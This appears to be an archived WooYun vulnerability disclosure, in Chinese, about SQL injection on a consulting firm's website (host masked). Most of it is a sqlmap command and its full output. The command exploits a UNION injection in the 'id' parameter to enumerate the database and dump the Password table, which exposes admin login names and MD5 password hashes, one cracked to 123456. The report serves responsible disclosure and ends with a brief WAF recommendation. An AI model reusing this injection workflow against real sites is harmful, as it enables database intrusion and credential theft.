乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
在2000年成立的卓越商務顧問有限公司,我們的顧問均擁有十年以上的國際標準咨詢經驗,其間協助超過 200 多間的中、小企業滿足客戶的要求。
地址:http://**.**.**.**/cert_details.php?id=46
python sqlmap.py -u "http://**.**.**.**/cert_details.php?id=46" -p id --technique=U --random-agent --batch -D sa8000_website -T Password -Cid,loginName,password --dump
---Parameter: id (GET) Type: UNION query Title: MySQL UNION query (95) - 3 columns Payload: id=46' UNION ALL SELECT CONCAT(0x7170786a71,0x5a544a724761664c7142614a6a78664f69487771566e5a5a6971626c734a467075554c6a4d624e65,0x716a6a7871),95,95#---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'sa8000@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'sa8000'@'localhost'Database: sa8000_website+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| Password | 2 || Partner | 1 || ProductsNode | 1 || ProductsNode_seq | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 739 || SESSION_VARIABLES | 512 || GLOBAL_VARIABLES | 497 || GLOBAL_STATUS | 403 || SESSION_STATUS | 403 || COLLATION_CHARACTER_SET_APPLICABILITY | 219 || COLLATIONS | 219 || PARTITIONS | 75 || TABLES | 75 || PLUGINS | 46 || CHARACTER_SETS | 40 || INNODB_FT_DEFAULT_STOPWORD | 36 || SCHEMA_PRIVILEGES | 16 || ENGINES | 9 || KEY_COLUMN_USAGE | 4 || STATISTICS | 4 || TABLE_CONSTRAINTS | 4 || PROCESSLIST | 2 || SCHEMATA | 2 || TABLE_STATISTICS | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: sa8000_websiteTable: Password[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: sa8000_websiteTable: Password[2 entries]+-------------------------------------------+| password |+-------------------------------------------+| e10adc3949ba59abbe56e057f20f883e (123456) || f245c7e2bfca14e49e2560f7bd54bd15 |+-------------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: UNION query Title: MySQL UNION query (95) - 3 columns Payload: id=46' UNION ALL SELECT CONCAT(0x7170786a71,0x5a544a724761664c7142614a6a78664f69487771566e5a5a6971626c734a467075554c6a4d624e65,0x716a6a7871),95,95#---web application technology: Apacheback-end DBMS: MySQL 5Database: sa8000_website[5 tables]+------------------+| Partner || Password || Products || ProductsNode || ProductsNode_seq |+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: UNION query Title: MySQL UNION query (95) - 3 columns Payload: id=46' UNION ALL SELECT CONCAT(0x7170786a71,0x5a544a724761664c7142614a6a78664f69487771566e5a5a6971626c734a467075554c6a4d624e65,0x716a6a7871),95,95#---web application technology: Apacheback-end DBMS: MySQL 5Database: sa8000_websiteTable: Password[5 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| createDate | date || id | int(11) || lastModDate | date || loginName | varchar(255) || password | varchar(255) |+-------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: UNION query Title: MySQL UNION query (95) - 3 columns Payload: id=46' UNION ALL SELECT CONCAT(0x7170786a71,0x5a544a724761664c7142614a6a78664f69487771566e5a5a6971626c734a467075554c6a4d624e65,0x716a6a7871),95,95#---web application technology: Apacheback-end DBMS: MySQL 5Database: sa8000_websiteTable: Password[2 entries]+----+-----------+-------------------------------------------+| id | loginName | password |+----+-----------+-------------------------------------------+| 1 | admin | f245c7e2bfca14e49e2560f7bd54bd15 || 3 | genius | e10adc3949ba59abbe56e057f20f883e (123456) |+----+-----------+-------------------------------------------+
上WAF。
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 19:37
已報告給網站聯絡人
暂无